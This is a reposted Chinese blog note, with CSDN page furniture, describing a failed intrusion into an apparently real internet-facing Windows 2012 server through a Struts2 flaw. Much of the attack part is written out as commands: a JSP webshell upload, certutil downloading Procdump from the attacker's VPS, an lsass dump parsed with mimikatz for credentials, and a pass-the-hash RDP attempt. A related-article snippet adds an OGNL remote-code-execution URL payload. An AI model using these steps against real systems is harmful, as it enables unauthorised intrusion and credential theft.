Struts2漏洞渗透笔记

最新推荐文章于 2022-10-29 20:42:49 发布
最新推荐文章于 2022-10-29 20:42:49 发布
阅读量275 收藏
点赞数
文章标签: java 操作系统
原文链接:http://www.cnblogs.com/zuoxiaolongzzz/p/9032663.html
版权

  虽然这是一次失败的渗透,但是也学到不少新姿势。

目标机环境:①外网②win2012③360全家桶

一,利用Struts2终极利用工具上传一句话

  jsp的一句话,有时候会出现兼容问题。比如Cknife的jsp一句话,K8飞刀就连接不了。我这里以Cknife为例子

二,一顿操作,虽然是最高权限,但是net被禁用。tasklist发现有360全家桶

①尝试用cacls.exe修改net.exe控制权限(失败)

②尝试关掉sc config 360rp start= demand(拒绝访问)

③CMD注册表开3389(失败)

④bat,vbs开3389(失败)

⑤上传open3389.exe(被杀)

三,创建用户没戏,就想着利用procdump+Mimikatz 绕过杀软获取Windows明文密码。

①procdump下载地址https://download.sysinternals.com/files/Procdump.zip

②解压好后,把Procdump.exe上传到目标机

③由于Struts2框架的问题。上传文件老是失败,我事先将Procdump.exe传到自己的VPS上

④在C刀命令行输入D:\>certutil  -urlcache  -split  -f  https://xxx.com/files/Procdump.exe

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

⑥运行mimikatz解密lsass.dmp

  用菜刀把lsaass.dmp下载并放到mimikatz.exe的目录,然后输入命令:

sekurlsa::minidump lsaass.dmp
sekurlsa::logonPasswords full

 

⑦后来才知道win2012修补了漏洞,lsass.dmp再也没有明文密码。得到的NTLM和SHA1值也跑不出

四,跑不出明文,只能Hash传递攻击Windows2012远程桌面

①kali安装使用freerdp

apt-get install freerdp-x11

xfreerdp -u admin -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129

可惜最后还是失败了,暂且想不到其他的操作。360还是强啊

 

参考:①http://www.91ri.org/14342.html

     ②https://www.cnblogs.com/backlion/p/7325228.html

          ③http://www.freebuf.com/sectool/105524.html

 

转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/9032663.html

weixin_30740295
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2 最新高危漏洞详解
m0_37630565的博客
03-13 2万+
由于计算机起源于美国,因此很多新兴技术和框架也都出于美国的一些大公司。虽然国内的BAT也在开源技术上有一些贡献,但目前来说还是比较缺少用户来支持。这也就导致了国内大部分互联网公司大量的依赖国外的技术。如果某些开源框架出了高危漏洞,就将影响一大批中国互联网公司。 最近 Struts2 又爆出了一个高危漏洞,据说影响了大半个中国互联网。涵盖金融、教育、医疗、电商等各个行业。哪么这个高危漏洞
每天一个小漏洞——struts2 系列漏洞
qq_54030686的博客
01-26 2600
每天一个小漏洞——struts2 系列漏洞 struts作为一个java框架出现了一系列的漏洞,判断是否为struts框架可以看网址路径是否为.action或者.do,如果是这两者其中之一为后缀,那么大概率是struts2框架,也可以按照 https://blog.csdn.net/qq_27446553/article/details/73639456 这篇文章描述的方法进行检测 利用方法:直接使用编译完成的struts2.exe即可 命令 struts2.exe -t url 即可 也可以使用pytho
渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 7192
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
渗透知识-Struts2漏洞
Jian Sun_的博客
02-11 4703
Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在处理action的时候,调用底层的getter/setter来处理http的参数,将每一个http的参数声明为一个ONGL。 2.struts2 漏洞利用: 步骤如下:1>验证漏洞: 证明了存在struts2漏洞。 2>执行命令: whoami 很大的administrat...
渗透测试-struts2攻防环境搭建拿shell
lza20001103的博客
04-14 1974
渗透测试之struts2攻防环境搭建
Struts2漏洞检查工具2018版.rar
03-31
Struts2各版本漏洞扫描利用工具
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
Struts2漏洞检查工具Struts2.2019.V2.3
struts2漏洞.rar
06-05
用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}链接,command goes here可以换成是破坏脚本的...
struts2漏洞修复
01-29
漏洞影响范围(Struts 2.3.5 - Struts 2.3.31, Struts 2.5 ...文件包含ognl-3.0.21.jar,struts2-convention-plugin-2.3.34.jar,struts2-core-2.3.34.jar,struts2-spring-plugin-2.3.34.jar,xwork-core-2.3.34.jar
Struts2漏洞检测工具2018最新版
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-...
procdump+mimikatz.zip
11-14
procdump+mimikatz
web渗透--62--JavaScript注入漏洞
武天旭的博客
09-23 2968
1、漏洞描述 JavaScript注入漏洞是跨站脚本(XSS)的一个子类型,涉及注入任意JavaScript代码的能力,由受害者的浏览器内部的应用程序执行。这个漏洞可以带来很多影响,比如公开用户的会话cookie后,可以被用于模仿受害者,也可以使得让攻击者修改受害者的页面内容以及操控应用程序运行。
渗透测试-Struts2远程代码执行漏洞
道阻且长,行则将至。
08-11 2180
漏洞描述 【漏洞概述】 Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。 该漏洞编号为CVE-2016-4438,目前命名为S2-037。黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有...
使用ProcDump工具抓取dump
weixin_33965305的博客
05-25 1533
首先得到要抓取的进程号 cd %windir%\syswow64\inetsrvappcmd list wp得到pid之后, 在任务管理器里发现w3wp.exe的CPU总在49%-60%左右, 间歇性地会下降一些. 我们需要在w3wp.exe的CPU在50%以上并能维持三秒钟的情形下抓取两组dump. 如果使用debug diag或adplus的话, 会比较困难, 因为这需要等待时机并手...
Struts2漏洞复现合集
weixin_42345596的博客
07-11 2761
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务
程序世界系列之-struts2安全漏洞引发的安全杂谈(上)
weixin_33725272的博客
07-25 439
目录: 1.讨论关于struts 安全问题。 2.黑客文化。 3.如何降低安全漏洞的出现。 4.忠告建议。 题记: 这篇文章本来很早应该和大家见面的,中间由于个人原因调整了系列文章发布时间,实属罪过。为了不误导大众文章中间讲述的经历想法实战,均属个人看法个人行为不代表任何团体及组织。观看者请保留自己的想法观点!欢迎各位热爱编程的技术人员交流。废话不多,开始正文。 1.讨论...
struts2映射jsp页面的第一种方法
07-28 198
1.UserAction类 package com.eduask.action; public class UserAction { //user_add.jsp页面;public String user_add(){return "user_add"; } //user_delete.jsp页面; public String user_delete(){return "user_d...
转:好用的抓取dump的工具-ProcDump
weixin_30299539的博客
03-09 663
Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.有了它, 就完全不需要在同一台服务器上使用诸如32位系统上的Debug Diag 1.1或是64位系统上的ADPlus了.问题描述===...
struts2漏洞中关于动态方法调用的一点思考
zzkk_的博客
08-14 1363
struts2框架是一个比较容易出问题的框架,我第一次正儿八经接触这块的漏洞是在陶大师给我了一个下文中场景2的站点开始,当时一点也不懂,自己搭了一个站点调试和学习了下,现在把自己掌握的一小块知识跟大家分享下。 其中包括了在s2-032,s2-045,s2-046测试中容易疏忽的一种利用场景。 struts2动态调用的时候 分为三种 1.指定method调用方式 这种情
struts2漏洞检测工具
最新发布
09-03
3. Metasploit:Metasploit是一款知名的渗透测试工具,其中包含了对Struts2漏洞的扫描和利用模块。通过使用Metasploit,你可以进行主动扫描目标系统的Struts2漏洞,并进行渗透测试。 这些工具都可以在网络上找到并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值